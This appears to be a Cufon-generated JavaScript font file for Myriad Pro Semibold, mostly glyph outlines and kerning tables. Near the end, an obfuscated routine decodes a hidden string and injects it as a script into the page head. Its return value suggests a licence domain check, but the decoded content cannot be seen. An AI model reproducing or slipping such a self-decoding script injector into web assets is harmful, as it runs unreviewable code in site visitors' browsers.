"33,0r10,-67r-30,0r0,-28r35,0r6,-46r-31,0r0,-27r35,0r9,-66r27,0r-9,66r35,0r9,-66r27,0r-9,66r29,0r0,27r-33,0r-6,46r30,0r0,28r-35,0r-9,67r-27,0r9,-67r-35,0r-9,67r-28,0xm109,-95r7,-46r-35,0r-6,46r34,0","w":189},{"d":"45,4v-16,0,-27,-12,-27,-28v0,-16,11,-28,27,-28v16,0,27,12,27,28v0,16,-11,28,-27,28xm28,-75r-6,-168r46,0r-6,168r-34,0","w":90},{"d":"155,0r-51,-94r-46,94r-51,0r72,-123r-69,-120r51,0r47,91r45,-91r51,0r-71,119r74,124r-52,0","w":213,"k":{"T":-3,"V":-3,"W":-3,"Y":-3,"A":4,"C":12,"G":12,"O":12,"Q":12,"J":-3,"c":6,"d":6,"e":6,"o":6,"q":6,"v":10,"w":10,"y":10,"a":3,"X":5,"\u00ad":7,"u":4}},{"d":"102,-32v38,0,44,-42,38,-82v-3,-16,-18,-32,-38,-31v-31,1,-44,25,-44,58v0,31,15,55,44,55xm91,-179v24,-1,40,10,50,22r0,-99r44,0r2,256r-39,0r-3,-28v-9,18,-29,34,-57,32v-49,-3,-75,-37,-75,-90v0,-54,26,-90,78,-93","w":209,"k":{",":4,".":4}},{"d":"48,-251r31,53r-31,0r-44,-53r44,0","w":108},{"d":"232,-116v-38,3,-37,92,0,94v36,-1,37,-93,0,-94xm233,-141v40,0,59,29,59,70v0,44,-20,74,-61,74v-40,0,-60,-30,-60,-71v0,-42,20,-73,62,-73xm70,4r136,-242r25,0r-136,242r-25,0xm71,-119v36,-1,37,-94,-1,-94v-38,3,-35,93,1,94xm72,-238v38,-1,59,31,59,70v-1,43,-21,74,-61,74v-40,0,-60,-29,-60,-71v0,-42,20,-72,62,-73","w":302},{"d":"104,-143v-57,0,-30,89,-36,143r-44,0r0,-256r44,0r1,104v11,-14,29,-27,52,-27v78,0,60,101,62,179r-45,0v-6,-53,20,-143,-34,-143","w":205,"k":{"T":19,"t":2,"v":6,"w":6,"y":6,"'":4,"\"":4}},{"d":"25,0r0,-243r51,0r63,104v15,26,29,54,41,82r-3,-186r41,0r0,243r-46,0r-86,-148v-9,-14,-14,-30,-22,-42v4,60,1,126,2,190r-41,0","w":243,"k":{"Y":5,"f":-3,"t":-4,"v":-1,"w":-1,"y":-1,"b":-2,"h":-2,"k":-2,"l":-2,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,"z":-3}},{"d":"58,-88v0,49,48,68,89,50r6,33v-65,24,-140,-4,-140,-81v0,-75,70,-109,140,-85r-8,33v-39,-19,-87,3,-87,50","w":161,"k":{"T":5,",":3,".":3,"c":3,"d":3,"e":3,"o":3,"q":3,"f":-2,"t":-5,"v":-6,"w":-6,"y":-6,"'":-1,"\"":-1,"\u00ad":-3}},{"d":"63,-270r0,360r-32,0r0,-360r32,0","w":94},{"d":"157,-112v50,74,-41,146,-130,106v-5,-2,-9,-4,-12,-6r10,-36v25,17,106,28,102,-18v-5,-58,-108,-37,-108,-110v0,-68,89,-85,144,-58r-11,36v-21,-14,-88,-23,-88,17v0,43,74,41,93,69","w":186,"k":{"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"t":1,"v":4,"w":4,"y":4,"a":-2,"j":3,"\u00ad":-3}},{"d":"161,-108r-91,0r0,72r102,0r0,36r-146,0r0,-243r141,0r0,37r-97,0r0,62r91,0r0,36","w":185,"k":{"T":-4,"V":-3,"W":-3,",":2,".":2,"J":-7,"c":1,"d":1,"e":1,"o":1,"q":1,"g":3,"t":2,"v":4,"w":4,"y":4,"u":3,"z":-2}},{"d":"20,-214v42,-39,154,-32,149,47v-5,68,-56,92,-91,131r96,0r0,36r-159,0r0,-27v35,-35,82,-66,105,-112v15,-29,-1,-63,-37,-63v-22,0,-38,10,-50,19"},{"d":"85,0r-1,-194r-43,22r-7,-34v29,-12,48,-33,94,-28r0,234r-43,0"},{"d":"9,-24r125,-182r-114,0r0,-37r171,0r0,26r-123,180r125,0r0,37r-184,0r0,-24","w":203,"k":{"Y":-1,"A":-2,"C":8,"G":8,"O":8,"Q":8,"J":-6,"c":4,"d":4,"e":4,"o":4,"q":4,"v":5,"w":5,"y":5,"X":2,"\u00ad":6,"u":3}},{"d":"105,-143v-57,0,-32,89,-37,143r-44,0r-2,-175r39,0v2,8,0,20,3,26v11,-16,29,-30,56,-30v80,0,61,101,63,179r-45,0v-6,-53,21,-143,-33,-143","w":205,"k":{"T":19,"t":2,"v":6,"w":6,"y":6,"'":4,"\"":4}},{"d":"115,-1v-45,14,-84,-4,-84,-59r0,-82r-25,0r0,-33r25,0r0,-33r44,-12r0,45r42,0r0,33r-42,0v6,42,-21,122,39,107","w":126,"k":{",":2,".":2,"c":2,"d":2,"e":2,"o":2,"q":2,"g":2,"v":-3,"w":-3,"y":-3}},{"d":"130,-174v-1,-21,-12,-33,-34,-33v-31,0,-44,37,-23,55v7,6,17,10,28,13v14,-4,30,-16,29,-35xm58,-66v0,24,15,37,39,39v36,2,51,-43,27,-64v-8,-7,-19,-11,-32,-15v-19,5,-33,18,-34,40xm21,-174v1,-44,35,-60,78,-64v74,-8,97,89,37,112v22,12,46,27,45,60v-2,47,-37,70,-86,70v-48,0,-81,-21,-83,-64v-2,-33,21,-49,44,-62v-20,-10,-35,-26,-35,-52"},{"d":"52,-175r41,133r40,-133r47,0r-67,175r-44,0r-65,-175r48,0","w":182,"k":{"T":12,",":16,".":16,"c":5,"d":5,"e":5,"o":5,"q":5,"g":4,"v":-6,"w":-6,"y":-6,"a":2,"s":4,"\u00ad":2,":":-5,";":-5}},{"d":"73,-24v0,17,-11,28,-28,28v-16,0,-27,-12,-27,-28v0,-16,12,-29,28,-29v16,0,27,12,27,29","w":84,"k":{"'":41,"\"":41}},{"d":"113,-93r0,-104v-17,39,-43,69,-64,104r64,0xm113,0r0,-59r-106,0r0,-29r96,-146r52,0r0,141r30,0r0,34r-30,0r0,59r-42,0"},{"d":"103,-111r0,30r-92,0r0,-30r92,0","w":113},{"d":"127,-32v47,0,67,-40,67,-90v0,-49,-19,-89,-67,-89v-48,0,-67,41,-67,91v0,49,20,88,67,88xm178,-12v19,8,44,10,64,16r-12,35v-40,-10,-71,-29,-111,-35v-67,-10,-106,-50,-106,-123v0,-78,42,-128,116,-128v73,0,112,50,112,123v0,57,-24,94,-63,112","w":253,"k":{"T":10,"Y":12,",":13,".":13,"A":5,"f":-5,"g":-2,"t":-5,"v":-4,"w":-4,"y":-4,"X":11,")":5,"]":5,"}":5,"\u00ad":-5,"u":-1,"x":3}},{"d":"58,-88v0,58,75,73,80,19v4,-40,0,-76,-37,-76v-28,1,-43,25,-43,57xm92,-179v28,-2,41,14,52,27r1,-23r39,0r-1,149v11,90,-82,123,-155,87r9,-33v39,26,120,13,101,-55v-9,15,-27,27,-51,26v-48,-3,-74,-35,-74,-86v0,-54,27,-89,79,-92","w":206,"k":{"T":12,",":6,".":6,"i":1,"m":1,"n":1,"p":1,"r":1}},{"d":"7,-26r92,-114r-85,0r0,-35r139,0r0,27r-90,113r92,0r0,35r-148,0r0,-26","w":162,"k":{"T":9,"c":3,"d":3,"e":3,"o":3,"q":3,"v":-6,"w":-6,"y":-6}},{"d":"95,-205v-24,-1,-38,22,-38,48v0,48,66,56,78,18v1,-36,-7,-64,-40,-66xm181,-138v0,94,-50,144,-148,141r0,-35v57,5,94,-24,102,-71v-36,41,-128,17,-122,-51v4,-51,33,-84,84,-84v58,0,84,42,84,100"},{"d":"42,-249v57,62,57,229,0,291r-32,0v53,-64,52,-228,0,-291r32,0","w":108},{"d":"66,42v-56,-65,-57,-226,0,-291r32,0v-53,63,-51,226,0,291r-32,0","w":108,"k":{"T":-12,"V":-13,"W":-13,"Y":-13,"A":6,"C":6,"G":6,"O":6,"Q":6,"J":-5,"X":-3,"j":-19}},{"d":"3,14r88,-261r31,0r-88,261r-31,0","w":121},{"d":"55,-85v0,30,13,55,45,56v25,0,37,-22,37,-48v0,-27,-14,-48,-41,-46v-23,1,-41,15,-41,38xm12,-97v0,-91,51,-141,146,-140r0,35v-55,-3,-95,25,-100,69v11,-14,28,-23,53,-23v45,2,71,29,71,76v0,50,-31,84,-82,84v-59,0,-88,-40,-88,-101"},{"d":"41,-78v-4,80,78,115,145,83r7,19v-82,36,-181,-6,-176,-100v4,-82,50,-137,133,-137v66,0,107,39,107,104v0,49,-21,83,-67,86v-17,0,-27,-15,-29,-30v-21,44,-89,38,-89,-17v0,-64,63,-100,126,-76v-4,29,-16,62,-12,93v2,6,5,8,11,8v28,-3,36,-31,36,-63v0,-54,-31,-85,-86,-85v-67,0,-102,47,-106,115xm103,-73v-2,29,31,30,44,12v12,-17,15,-43,20,-67v-38,-8,-62,18,-64,55","w":271},{"d":"176,-234r0,28r-98,206r-47,0r99,-198r-111,0r0,-36r157,0"},{"d":"127,-231r-37,46r57,-9r0,31v-18,-2,-40,-8,-57,-8r37,44r-28,16r-21,-54r-22,54r-26,-16r36,-45r-55,9r0,-31v18,2,39,8,55,8r-36,-45r27,-16v8,17,13,37,22,53r21,-53","w":157},{"w":74,"k":{"T":14,"V":13,"W":13,"Y":15}},{"d":"109,-144v-33,0,-41,30,-41,71v0,26,16,42,40,43v30,1,45,-27,45,-58v-1,-31,-12,-56,-44,-56xm198,-90v6,78,-82,121,-130,71r0,90r-44,0r-2,-246r39,0v2,8,0,20,3,27v11,-19,32,-31,60,-31v49,0,70,38,74,89","w":210,"k":{"T":16,",":11,".":11,"v":3,"w":3,"y":3,"'":6,"\"":6,")":2,"]":2,"}":2,"\u00ad":-5,"z":3,"x":7}},{"w":74},{"d":"74,-199v-1,36,-19,85,24,84r0,23v-42,-2,-25,48,-24,83v1,38,-24,52,-64,49r0,-25v68,7,-6,-109,56,-119v-37,-4,-27,-53,-24,-89v2,-20,-10,-30,-32,-28r0,-26v39,-2,65,10,64,48","w":108},{"d":"45,4v-16,0,-27,-12,-27,-28v0,-16,12,-29,28,-29v16,0,27,13,27,29v0,16,-12,28,-28,28xm45,-117v-16,0,-27,-12,-27,-28v0,-16,12,-29,28,-29v16,0,27,13,27,29v0,16,-12,28,-28,28","w":84},{"d":"58,-87v-10,61,77,75,83,20v4,-41,-2,-77,-39,-77v-29,-1,-45,26,-44,57xm91,-179v26,-1,41,13,52,27r1,-23r43,0r-2,246r-44,0r-1,-95v-10,16,-28,29,-54,28v-49,-2,-73,-38,-73,-89v0,-54,26,-91,78,-94","w":209,"k":{"T":13,",":3,".":3}},{"d":"50,-175r31,136v9,-47,25,-91,37,-136r36,0r36,136v7,-48,21,-91,31,-136r44,0r-55,175r-41,0r-35,-127v-9,45,-22,86,-36,127r-41,0r-52,-175r45,0","w":269,"k":{"T":12,",":16,".":16,"c":5,"d":5,"e":5,"o":5,"q":5,"g":4,"v":-6,"w":-6,"y":-6,"a":2,"s":4,"\u00ad":2,":":-5,";":-5}},{"d":"118,-249r-7,92r-26,0r-8,-92r41,0xm56,-249r-7,92r-27,0r-7,-92r41,0","w":133,"k":{"T":-5,"V":-5,"W":-5,"Y":-2,",":43,".":43,"A":19,"C":3,"G":3,"O":3,"Q":3,"J":21,"c":4,"d":4,"e":4,"o":4,"q":4,"f":-9,"g":5,"t":-8,"v":-5,"w":-5,"y":-5}},{"d":"122,-192r0,82r79,0r0,28r-79,0r0,82r-29,0r0,-82r-79,0r0,-28r79,0r0,-82r29,0","w":214},{"d":"26,-243r140,0r0,37r-96,0r0,67r89,0r0,36r-89,0r0,103r-44,0r0,-243","w":183,"k":{",":33,".":33,"A":26,"J":28,"c":10,"d":10,"e":10,"o":10,"q":10,"g":4,"v":8,"w":8,"y":8,"M":6,"a":15,"b":6,"h":6,"k":6,"l":6,"i":8,"m":8,"n":8,"p":8,"r":8,"u":11,":":6,";":6}},{"d":"27,40r0,-287r70,0r0,26r-38,0r0,236r38,0r0,25r-70,0","w":108,"k":{"T":-12,"V":-13,"W":-13,"Y":-13,"A":6,"C":6,"G":6,"O":6,"Q":6,"J":-5,"X":-3,"j":-19}},{"d":"68,-256r1,158v16,-29,37,-51,56,-77r54,0r-66,71r75,104r-55,0r-50,-77r-15,17r0,60r-44,0r0,-256r44,0","w":183,"k":{"T":9,",":-3,".":-3,"c":3,"d":3,"e":3,"o":3,"q":3,"g":3,"v":-3,"w":-3,"y":-3,"a":-4,"b":-5,"h":-5,"k":-5,"l":-5,"i":-5,"m":-5,"n":-5,"p":-5,"r":-5,"\u00ad":3,":":-2,";":-2}},{"d":"53,-175v13,20,24,42,38,60v11,-21,23,-41,35,-60r48,0r-59,84r60,91r-50,0r-38,-64r-37,64r-48,0r61,-90r-59,-85r49,0","w":177,"k":{"T":9,"c":7,"d":7,"e":7,"o":7,"q":7,"t":-5,"v":-6,"w":-6,"y":-6,"s":3,"\u00ad":2}},{"d":"3,44v8,-31,19,-61,24,-95r46,-4v-11,33,-22,69,-40,96","w":84,"k":{"'":41,"\"":41}},{"d":"87,14r-84,-261r30,0r85,261r-31,0","w":120},{"d":"180,27r0,18r-180,0r0,-18r180,0","w":180},{"d":"103,-111r0,30r-92,0r0,-30r92,0","w":113,"k":{"T":19,"V":7,"W":7,"Y":20,"A":2,"C":-5,"G":-5,"O":-5,"Q":-5,"J":4,"c":-6,"d":-6,"e":-6,"o":-6,"q":-6,"g":-3,"X":7}},{"d":"22,-108r170,-83r0,32r-135,64r135,63r0,32r-170,-82r0,-26","w":214},{"d":"127,-32v48,0,67,-39,67,-90v0,-49,-19,-89,-67,-89v-48,0,-67,41,-67,90v0,49,19,89,67,89xm125,4v-74,0,-112,-50,-112,-124v0,-77,42,-127,116,-127v73,0,112,50,112,123v0,77,-39,128,-116,128","w":253,"k":{"T":10,"Y":12,",":13,".":13,"A":5,"f":-5,"g":-2,"t":-5,"v":-4,"w":-4,"y":-4,"X":11,")":5,"]":5,"}":5,"\u00ad":-5,"u":-1,"x":3}},{"d":"193,-82r-171,82r0,-32r137,-64r-137,-63r0,-32r171,82r0,27","w":214},{"d":"26,-243r44,0r0,206r100,0r0,37r-144,0r0,-243","w":177,"k":{"T":35,"V":22,"W":22,"Y":31,"A":-1,"C":14,"G":14,"O":14,"Q":14,"J":-7,"c":4,"d":4,"e":4,"o":4,"q":4,"t":2,"v":12,"w":12,"y":12,"'":36,"\"":36,"\u00ad":10,"U":12,"u":5}},{"d":"56,-249r-7,92r-27,0r-7,-92r41,0","w":71,"k":{"T":-5,"V":-5,"W":-5,"Y":-2,",":43,".":43,"A":19,"C":3,"G":3,"O":3,"Q":3,"J":21,"c":4,"d":4,"e":4,"o":4,"q":4,"f":-9,"g":5,"t":-8,"v":-5,"w":-5,"y":-5}},{"d":"156,-110v30,41,3,102,-47,104r0,37r-29,0r0,-35v-23,0,-45,-8,-58,-16r9,-34v23,16,91,29,95,-12v-11,-52,-104,-34,-102,-101v0,-34,25,-57,58,-61r0,-35r30,0r0,33v21,0,36,5,49,12r-9,33v-18,-12,-84,-24,-84,13v0,36,71,38,88,62"},{"d":"104,-218v-35,1,-29,54,-8,68v17,-11,32,-20,33,-41v1,-13,-10,-28,-25,-27xm78,-112v-36,14,-31,83,20,83v19,0,32,-7,41,-16xm227,-136v-7,37,-18,66,-38,90r41,46r-51,0r-20,-20v-41,41,-148,29,-148,-44v0,-38,24,-55,47,-72v-37,-37,-15,-115,48,-111v36,2,61,20,61,55v0,35,-26,46,-51,65r49,55v10,-16,19,-39,22,-64r40,0","w":232},{"d":"126,-73v0,-45,-51,-49,-98,-43r15,-118r122,0r0,37r-90,0r-7,47v56,-7,103,18,104,73v2,75,-95,99,-157,67r9,-33v31,18,102,20,102,-30"},{"d":"144,-102r-32,-105r-31,105r63,0xm74,-69r-21,69r-45,0r77,-243r57,0r79,243r-48,0r-22,-69r-77,0","w":228,"k":{"T":29,"V":21,"W":21,"Y":32,"C":8,"G":8,"O":8,"Q":8,"J":-6,"c":5,"d":5,"e":5,"o":5,"q":5,"f":4,"g":5,"t":5,"v":10,"w":10,"y":10,"b":2,"h":2,"k":2,"l":2,"i":2,"m":2,"n":2,"p":2,"r":2,"s":1,"X":7,"j":2,"'":19,"\"":19,")":5,"]":5,"}":5,"\u00ad":2,"U":12,"Z":-1,"u":5,"z":-3}},{"d":"59,-121v0,65,53,101,118,83r0,-61r-43,0r0,-35r86,0r0,123v-93,35,-207,3,-207,-108v0,-103,101,-148,199,-115r-9,36v-62,-27,-144,-1,-144,77","w":239,"k":{"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"a":-3}},{"d":"96,-24v0,17,-11,28,-28,28v-16,0,-27,-12,-27,-28v0,-16,12,-28,28,-28v16,0,27,12,27,28xm139,-192v0,55,-56,58,-50,118r-39,0v-8,-56,39,-69,44,-112v3,-33,-47,-28,-66,-15r-10,-31v37,-26,121,-20,121,40","w":154},{"d":"77,-224v0,12,-10,23,-26,23v-15,0,-24,-10,-24,-23v0,-13,10,-24,25,-24v15,0,25,10,25,24xm-15,42v40,1,46,-32,45,-73r0,-144r44,0v-10,101,40,251,-85,252","w":97,"k":{",":4,".":4}},{"d":"144,-172v0,-37,-39,-43,-75,-37r0,77v40,3,75,-4,75,-40xm152,0v-19,-37,-8,-115,-83,-100r0,100r-43,0r0,-239v67,-10,162,-14,162,63v0,36,-23,49,-44,62v40,16,36,79,53,114r-45,0","w":204,"k":{"T":-2,"V":-1,"W":-1,"Y":5,"A":-3,"J":-1,"t":-5,"v":-3,"w":-3,"y":-3,"a":-4,"b":-3,"h":-3,"k":-3,"l":-3,"i":-4,"m":-4,"n":-4,"p":-4,"r":-4,"X":-3,"U":1}},{"d":"81,0r-78,-243r48,0r57,199r60,-199r48,0r-84,243r-51,0","w":216,"k":{"T":-10,"V":-4,"W":-4,",":23,".":23,"A":20,"C":2,"G":2,"O":2,"Q":2,"J":12,"c":14,"d":14,"e":14,"o":14,"q":14,"g":3,"v":4,"w":4,"y":4,"S":1,"a":14,"b":3,"h":3,"k":3,"l":3,"i":8,"m":8,"n":8,"p":8,"r":8,"s":12,"'":-5,"\"":-5,")":-15,"]":-15,"}":-15,"\u00ad":7,"u":9,":":7,";":7}},{"d":"14,-46r0,-28r186,0r0,28r-186,0xm14,-119r0,-28r186,0r0,28r-186,0","w":214},{"d":"126,-84v35,52,-23,106,-90,84v-9,-3,-17,-5,-23,-9r9,-32v18,19,96,17,66,-21v-25,-15,-70,-23,-70,-63v0,-54,70,-64,113,-44r-9,31v-13,-10,-62,-20,-62,9v0,27,53,26,66,45","w":150,"k":{"T":11,",":4,".":4}},{"d":"65,0r-60,-243r48,0r39,195r44,-195r47,0r39,194r42,-194r45,0r-66,243r-47,0r-39,-191v-11,67,-29,128,-44,191r-48,0","w":312,"k":{"T":-10,"V":-4,"W":-4,",":23,".":23,"A":20,"C":2,"G":2,"O":2,"Q":2,"J":12,"c":14,"d":14,"e":14,"o":14,"q":14,"g":3,"v":4,"w":4,"y":4,"S":1,"a":14,"b":3,"h":3,"k":3,"l":3,"i":8,"m":8,"n":8,"p":8,"r":8,"s":12,"'":-5,"\"":-5,")":-15,"]":-15,"}":-15,"\u00ad":7,"u":9,":":7,";":7}},{"d":"48,-117v-16,0,-27,-12,-27,-28v0,-17,11,-29,27,-29v16,0,27,12,27,29v0,16,-11,28,-27,28xm3,44v8,-31,19,-61,24,-95r46,-4v-11,33,-22,69,-40,96","w":84},{"d":"121,-221v-31,-11,-54,8,-48,46r38,0r0,33r-38,0r0,142r-44,0r0,-142r-24,0r0,-33r24,0v-6,-61,38,-98,95,-80","w":114,"k":{",":13,".":13,"c":4,"d":4,"e":4,"o":4,"q":4,"g":4,"t":-5,"s":3,"'":-17,"\"":-17,")":-31,"]":-31,"}":-31,":":-11,";":-11}},{"d":"24,-256r44,0r0,256r-44,0r0,-256","w":92,"k":{",":4,".":4}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+359-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("g%w[l2$=*+h^g-Vp>2nkm%mhza$[w2h^zark*+1Qw~c]oH=_zxrdo6ID~dBJz2~mf[Ie+z~9~x=HU=$kfxVBmknow%ZV*d;6{n$nM6n*lQ0)>_)=s~nQf6XBgnj9$XZWgVP[M}IJM5ZG{|BP>[j_g=wl*WG]znP{z5xjM%nX7dce|-KXr6~I1Hh(xVohK[Kpw2j_sQ$jl%V=g-m_gUPB7|Z]K}[_sQZ]l}[js2PVl2>=*-PQ7+m^w_;Ql5Vj*5MhfW=p*+oio_;9*H=9z_G.SQ>W>[j^g|ci7Hi^g[j^$6ZI-}dn%5mrgsM$S701U|x~+zow*lK>f{GJ_6XV2QiB(A]D^9jPkH=[aW);!pche.d;oaP9>+1Ks2$9lUXXsaX^>%~H>-J]la$J>%V9l_;ilW$=l2nDwUXBw2hkg}DB7%jpgkDBg+>lo[DBz~=hKnDBzz=Bg-XG")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":192,"face":{"font-family":"Myriad Pro","font-weight":600,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 3 3 4 3 2 2 4","ascent":"270","descent":"-90","x-height":"4","bbox":"-15 -270 309 90","underline-thickness":"18","underline-position":"-18","unicode-range":"U+0020-U+007E"}}));
